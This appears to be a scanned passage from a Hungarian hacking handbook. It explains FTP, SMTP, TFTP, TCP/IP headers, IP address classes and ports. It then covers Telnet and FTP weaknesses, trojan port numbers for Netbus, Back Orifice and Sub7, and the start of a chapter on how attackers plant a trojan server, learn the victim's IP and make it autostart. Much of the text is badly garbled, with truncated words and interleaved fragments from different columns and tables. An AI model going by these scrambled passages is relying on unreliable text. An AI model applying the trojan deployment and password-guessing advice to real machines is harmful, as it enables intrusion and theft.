átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. amely nagyon nagy ásokat igényelne. A címzett minden fogadott csomagról egy ü feladónak. • Ellenőrzés. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. am egyidejű átvitelére lehet használni. A TCP az egyik fő protokoll. ent egy számítógép. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni. gondoskodva arról. a már említ UDP (User Datagram Protocol). domain a NIS-adatbázisban leképezett számítógépek csoportja.Windowing-nak is nevezik. Az átmenetekkel nem volt könnyű megbirkózni. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. lehetővé teszi a decentralizált userID-k. vagyis az adatfolyam prioritá küldése. A pontosabb felépítésébe itt nem megyünk bele. audió stb. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. amely már nem ak a tiszta szövegküldésre. elszavak központi adminisztrációját. Ebben a hibael funkciói segítenek. kompatibilitási ek fel. s ez igazolja az átvitel tökéletességét. ha több különböző kapacitású szádelkezésre. hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. A transzport rétegben két protokoll található. és olyan feladatot kell elvégezni. amely a szervertől kap adatokat. Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. de nem változtatni ezeket. Ha egyszer még elő az adatátvitelben. egy multikomputerré olvadnak össze. így a különböző számítótni. így nayes konvertereket kellett alkalmazni. amelyet eredetileg a SUN fejleszYellow Pages volt a neve).as években más mail-rendszereket is bevezettek. Ez a rendszer. is át lehet küldeni vele. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése. • Az adatfolyamok priorizálása. . hanem a legkülönbözőbb adattípusoka. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. • Optimalizált adatfolyam .

illetve a szerverhez olódni. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. Totál Lenght: az adatcsomag teljes hossza bájtban (max. Hogy ezt elkerüljék. Ezt nevezik p lásnak (Buffer Owerflow). Ugyanúgy biztosítatlan. nszportréteg alatti rétegek tartalmaznak. egy alkalmazáscsatoló-felület az IP-hez. Az UDP ezt a. a DoS-támadásokró ben többet mondunk. hogy milyen szolgáltatások érP-vel. mint például az Internet Explorer. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. hogy nem lépett-e fel súlyos hiba az adatátvitelben. Ezek és a két következő mező vezérlik a reassembly-t (ld . amellyel a távoli számítógéphez. a TCP-re bízhatja a kapét. 53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. A f azt jelenti. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. azonban közeledik a váltás a 6. mint azok a protokollok. Az interneten pillanatnyilag m használják. Type of Service: minden bitnek csak ajánlókaraktere van. például: Internet Protocol (IP) ő számítógép. és közli a UDP-header adatainak az t. Az UDP azonban nem kéri a fogadás megerősítehát. amelyet néh zatban (LAN) már használnak. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. amely a TCP-nél említett tulajdonságok dicsekedhet. megerősítéssel válaszol. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. az lefagyaszthatja a PC-t. amelyet three-wayneveznek. tud adatokat továbbítani az alkalmazásoknak.s felügyeli. azás. ehhez persze még más fontos protokollokra is szükség van. megnyitása után mindkét irányba áramolhatnak az adatok. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős. a csomagot részcso bolják. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. miszerint biztonságos átviteli protokoll. Ebből látszik. amelyről később. az adatok hosszáról. Az ok. Hálózati réteg Ez a réteg különböző protokollokat fog össze. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. és a kapcsolat felépül. kis táblázat példákat mutat arra. En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. amelyek aktíva az adatok átvitelében. mint a TCP. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. hogy a TCP teljes felel a hírének. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele. ot egy három részből álló folyamat vezeti be. mondhatni. A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. verzióra. illetve a TCP-vel.

Ezáltal teljesül a 1 6 bites ás. • gments: hogy kiderüljön. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be. logikai c tárolni. hogy hiányoznak-e töredékek. Itt van feljegyezve a fogadó címe. Routolási hibánál. Address: a célállomás internetcíme. meg kell delt ULP (Upper Layer Protocol) protokollt. az internetprotokoll igazán komplex. címből állítaná elő a fizikait. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. Offset: egy adatcsomag adatbájtjait számozza. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. hogy tékre csökkenjen. Mivel a különböző protokollok az IP-re támaszkodnak. Tehát a logikai címet a fizikai címre kell cserél az ARP. Options: opcionális mező további információknak.bitnek a következő a jelentése: gment: olyan hostokhoz. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. minden továbbinál egy fragmezőjének a hosszával növekszik az érték. és egy RARP-választ küldenek vissza. mivel semmilyen módon nem áll összeköttetés hardvercímével. és kiosztja a fragAz első fragmentum offset O-t kap. és ezért mindig csak a fizikai cím ismeretével bootolnak . és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. Mint látjuk. a firmware á niált fizikai címe. Ez egy headerből és az ARP-csomagból áll. A RARP az ARP-vel ellenkező irányban működik. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. Ekkor a következő router már nem veszi fel. A legfontosabbak: • Record Route: naplózza az adatcsomag útját. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. amelyek nem támogatják a álást. de mindez az adatok átvitelét szolgálja. • Padding: kitöltő bitek. hogy bináris null re egészítse ki a frame-et. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. Ahelyett. ress: a forrásállomás internetcíme. például huroknál. hogy egy adatcsomag minden umát fogadta-e. amelyet például az interneten talál meghajtó egymagában nem képes arra. a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy. Itt van feljegyezve a küldő száme. az lamikor el lesz távolítva a hálózatról. Mivel az időmérés meglematikus a hálózatban. Ennek az értéknek a dja a címzett megállapítani. amelyben tartós. A padding feladata. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. A számítógépes kommunikációhoz azonban n nem logikai címet használnak. Sok kódot kiegészítésekhez terveztek. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. hogy a logikai címén számítógépet. lően kell alakítani az ellenőrzőszámot.

például a hibaüzenetek közvetítése. Most megjelenik: Welcome. mindkét irányra kiterjedő. eírás cho reply 8 Time est 16 17 6.de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. 5. 4 -elterelés. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. Ezután nyomjuk le az Enter-t. ehhez a Telnet egy terminált szimulál (szöveg. Kattintsunk a Kapcsolatra. hogy távoli s jelentkezzenek be az interneten. Gépeljük be a telnet. Ez ugyanaz a folya FTP-nél. és az adatok visszajönnek a számítógépre. A Telnet tehát lehetővé teszi a felhasználóknak. 3. Adjuk meg a login-nevünket. 11 Time exceeded: a timer puffer-erőforrások elhasználva. 4.3. ány alkalmazás és protokoll használata és ztonságosságuk 9. 8 bit/bájt-orie kációs lehetőséget nyújtani. 10.exe sort. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. amelyet az FTPlunk (ld.ontrol Message Protocol (ICMP) eladata az üzenetek. a Telnet elindul. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. és parancsokat hajtassanak végre mítógépeken. A szokásos módon tárcsázzunk be a szolgáltatónkhoz. Megjelenik egy pá 7.ietf. és készen áll. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1. n megfelelően módosul. Ugyanaz IP-t. a szerver üdvözöl. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek. a Telneten keresztül programokat is el lehet rendszereken. 3. A Telnetet az RFC 854 (Request for Comment. . 5 Paraméter Problem: Paraméter-probléma. 2. 12. Sőt. Kattintsunk a Hálózati rendszer kapcsolatra. Váltsunk vissza a Telnet-re.1 A Telnet aüzenetekről. Kattintsunk az OK-ra. Ez az a név. mintha maga is egy fölérendelt protokoll lenne.org/) a következőképpen defini protokoll célja egy általános. 11. azonban kotórésze. Most a szerver a jelszót akarja tudni. lejjebb). az internetfejles kafeljegyzése. Beírjuk a következőket: • Hostnév: meine-domain. http://www.

illetve FTP da futnia a célszámítógépen. akkor a szerver hibakóddal válaszol. amiért nem látjuk. ubis2$. egy betolakodó. . biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. 3. Az A fontos szolgáltatás az interneten. Az FTP-t az for Comments. ilyen például a y a WS_FTP. elsősorban programokon keresztüli hasznáék. Mivel a Telnet felhasználóazonosítást kíván (loginnév. lehet írni a parancsokat. hogy minden adatot kódolatlan szövegként visz át. FTP-szervernek. Ezt a támadást Brute Force-rohamnak is nevezik. szervereknél ki lehet találni az érvényes login-neveket. adatok megbízható és hatékony átvitele. tehát akárhányszor m a jelszót. amit írunk. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. b3$ stb. Az FTP biztonsága Az FTP nem túl biztonságos protokoll. Ha valak login-nevet ad meg. s különbözőképpen tá a legfontosabb támadási formák. pcsolatban vagyunk a szerverrel. mert általa a programok vagy a d minden internet-felhasználó számára elérhetők. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. A CuteFTP felülete e még egyszer az Enter-t.rtassuk magunkat. mivel a szabvá cióban nincs korlátozás a jelszavak beírására. jelszó). és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. a jelszó beírása ható. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. FTP ávoli rendszerek közötti adatátvitel egyik módszere. A parancssort lehet látni. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. adatátvitel egy FTP kliensen keresztül történik. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. porton keresztül teszi fel. 2. pl. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. ha beleolvas a omba. nagyon könnyen megszerezheti a fiókadatokat. Bár az FTP-t egy vetlenül is lehet használni. Egy kapcsolat létrehozásához. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van.

íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni. mális számként írják le. A beszélgetésekhez ma már kliens valamelyikét használják. többnyire a p írásmódot használják. felhasználói adatok birtokába juthat. a bb csatornákon (channels) lehetnek. az IP-címmel érhető el. a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik. Többrésztvevős valós idejű konferenciákat tesz lehetővé. Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re. Erről a óló fejezetben további részleteket tudhatnak meg. ha egy betörő lózati forgalmakba.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. hogy egy ügyfél a szolgáltatójától kapja ges IP-címet. trójai). ami azt jelenti. Az interneten rás egy egyértelmű számmal. A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna. Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál. A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik.ripe.net). felhasználók.euirc. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). De az IRC-parancsokból is sok információt tudhat me felhasználóról. amelyeket a chat-en mondott nekik ajtsanak. Az IP-címek archikus. szervertől függően (IRC szerver. Leginkább az újoncok vehogy bizonyos parancsokat. Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. ahol mindig szívesen küldenek t rusokat (ld. 3. az IP Numbering Autho pában a RIPE (http://www. miközben a hálózatok üzemeltetői időbeli kül. pl. blokkokban kölcsönzik IP-címeiket. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is. eltöltés jelszófájlt. A legismertebbek közé tartoznak hC és a pIRCh. a trójaiaknál). IRC-felület A címzés az interneten az IP-címzésen alapul. amelynél a 32 bit 8 bitekre van felosztva. irc.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4.ffing TP kódolatlan szövegként továbbítja az adatokat.3. . Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek.

amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni. Már ma is szűkösen megy a B.x.x internetre kapcsolódó intranet helyi gépei számára van fenntartva.x.és C.x. Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172. TCP/IP viss Ez az A-osztályú há hurokként szolgál. aaa. amelyre információk tudnak bejön menni. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre). amelyet a szolgáltatók nem oszthatnak ki.x-ig 240. 224. 172. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül). az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át.x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni. egyetlen x. szegmens észen kiosztva kapják. Ezért van be állni.16.0 és x.bbb. Az A-osztályú hálózatokat azonban mára már mind kiosztották.31.x.x. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím. Néhány ilyen csatolófelületet biztosan minden felhasznál .168. és a második negyedben van a 0-255-ig ékterület. mivel a szabad számkészlet mindig kisebb lesz.x.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak. ezér magyarázat következik. amelynek ez az első szegmense.x. és tok tulajdonosainak az első három szegmenst (aaa.x.x). belüli IP-címeket csak az intraneten b Az 1.x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki.ccc. ntesítés céljából az InterNIC. az InterNIC-től függetlenül.x gépei számára van fenntartva. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni. C-osztályú hálózatokon 255.ti osztályok kiderült.x239.x. amely a 90-es évek elején átvette az elését.bbb. amely a további szövegek jobb megértésé A port egy csatolófelület.x. Így jöttek létre a hálózati osza.168. a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig).4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával. mert más célokat 3. 10. amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van.x. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad. 192. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x.x. x. amelyek.x. a 255 a negyed 127.x255.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét.x.x.x. és a maradék 16 bitet adhatják ki maguk (ez 254-ig.255-ig routolni.x.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig.x-i intraneten belül lehet routolni. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1. A C- címek kiadása. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten.x. internetre kapcsolódó intra-00192. A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek.bbb. az Ipv6 IP-címzési rendszer. önállóan a hozzájuk utalt címtartományokat. gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba.

illetve rossz szándékú támadások agy fogadhatók. a 25. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz.ik például az egér és a billentyűzet mint adatbeviteli eszközök. Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt. A nagyobb portokat dinamikus vagy privát portoknak nevezik. Ezért ajánlatos a rendszer gyakori vizsgálata egy el . portszámról megy. Az 1-1023-ig portok a standard.org/assignments/ numbers weboldalon található. után a monitor vagy a nyomtató jelenti. akkor ez porton vár kérdésre. ok/ról/on káros adatcsomagok. E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. s a megfelelő szolgramhibáira építenek. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t. hanem erportokról van szó. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe. A manipulált adatdéséhez általában adott portokat használnak. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www. ez a port tehát nyitott. és gyakran bizonyos szervizekhez vezve. désre vár. ezeket más aját készítésűek is. Ha egy FTP szervert telepítünk a rendszerre. . de rendszerint mindenki használhatja őket. így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3). ha egy program ezen a porton egy kérésre (request). kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. számú portjával.de) -. a Unixnak és a BeOs-nak is. Itt azonban nem fizikai.ilyen például a 7tf Sphere (www.iana.hackerzbook. Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. Ezeket a portokat számokkal jelölik. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek. 5536 port van. és az portok lezárása egy tűzfallal. Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. t portok az 1024-49151 portok. használhatják. illetve statikus Well known portok. A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza. tehát vannak a Linuxnak. kkor nyitott.

.de címen kapunk pontos listát.A portokat a trójaiak is használják.secure. ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait. Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www.un.

1 A szerver kiosztása 4.4 Módszerek az Explorer.6.3 Hogyan szerzik meg a hackerek az IP-t? 4.2 A történelmi minta.6.6 Sub7 .1 4.3.4 Elég egy CD és az automatikus lejátszás funkció 4.5.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4.exe-vel a C:\ meghajtóra 4.2.és trójai-szkenner 4.5 A runonce.6.3.3.4 4.Tartalom 4.Hálózati eszköz vagy támadás a Microsoft ellen 4.2.2.4.6 További terjesztési stratégiák 4.2 AutoRun bejegyzések 4.1 A trójaiakat fájlokba integrálják 4.exe kicserélése áll egy trójai? .1 Vírus.3.5 A lemezek majdnem ugyanígy működnek 4.3 Windows-Registry ez már izgalmas 4.3.3 A trójaiakat az ICQ-val is tovább lehet adni 4.6.3. fejezet .1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4. Miből 4.egy trójai rémisztő lehetőségekkel 4.3 Így álcázzák és terjesztik a trójaiakat 4.4.2 Álcázás a WinZip-pel 4.2 A kliens otthon marad.3.6. és vezérli a szervert 4.5 4.1 Támad a Sub7 BackOrifice 2K .

De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása. A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét. hogy miből is áll egy trójai. Hogy a trójai eltitkolja az elhelyezését. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. hogy el is indítsa a szervert. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz. álcázást használ. és Trója kapuja elé állíttatta. 4. vagyis egy keyboard logfájlt készít. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program. amely lehetővé teszi az idegen számítógép „távirányítását". hanem a számítógép távirányítását is lehetővé teszik.1 A szerver kiosztása Ahhoz. de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. A szerver a központi program. Trójainak tehát egy szoftvert nevezünk.2 Miből áll egy trójai? Először is tudni kell. Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. amely látszólag hasznos funkciókat hajt végre. Trója elesett . amely a város közelében rejtőzött. amelyről azt sem tudjuk. amely információkat közvetít úgy. amelybe meg nem engedett kódot ágyaztak . Mindig valami váratlant tesz. az kiderül a továbbiakban a különböző trójai programok leírásából. Hogy az akciók lehetőségei milyenek lehetnek. akik azután éjszaka kimásztak a ló hasából. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé. hogy a számítógépünkre került. a görög Odüsszeusznak támadt egy ötlete. Az elérés csak akkor jöhet létre. 4. hogy ostrommal nem tudják bevenni. Ez a tipikus feladata egy keylogger-nek. amelyekről a fertőzött rendszer felhasználója mit sem tud. Különböző műveleteket hajt végre. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. Erre a görögök évekig ostromolták eredménytelenül Trója városát. telepíteni kell a szervert a cél-. amely valami hasznosat vagy csak valami érdekeset csinál. amelyek nemcsak adatokat küldenek el. ként működik. illetve áldozat PC-re. és önfeledten ünnepeltek. A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. Úgy képzelhető el. mégis mérhetetlen károkat okozhat. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. akárcsak a görög katonák. a trójaiak isteni jelképét. * A felhasználót rá kell venni arra. Építtetett egy hatalmas falovat. ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg. Jóval komplexebbek azok a programok. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni. De lehet egy olyan program is. ha a szerver . hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál.mint program aktív. Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül .ilyenkor a program a trójai program hordozója- . és kinyitották a város kapuit a görög seregnek.2.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs.A trójaiak 4.a hackerek pedig a magukévá tették a trójai faló ötletét. Ezután a görögök visszahúzódtak.tehát az eredeti program megváltoztatása. a trójai király megszöktette a szépséges görög Helénát. amely egy fájlba naplózza felhasználói beviteleket. azaz „rá kell sózni". Amikor látták. A trójai lehet egy hasznos program. hogy egy számítógép vagy annak az adatai elérhetővé váljanak.

az IP-keresés viszonylag egyszerű. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. A második lépésben el kell érni. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét. Csak ezután lehet célzottan megszólítani. dinamikus IP-címet kap. ha mondjuk átvitel közben IRC-n vagy ICQ-n keresztül. Az akciók lehetnek viszonylag ártalmatlanok. a támadónak egy vezérlőprogramra is szüksége van. Szerencsére a programozás nagyon hibás volt. Ez megnehezíti a trójai szerver elérését. EzEgy másik lehetőség.2. az a felhasznált szoftvertől függ. hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. ha nincs fennálló közveden online-kapcsolat. A különböző trójaiak leírása a továbbiakban következik. hogy az áldozataikhoz jussanak.3 Hogyan 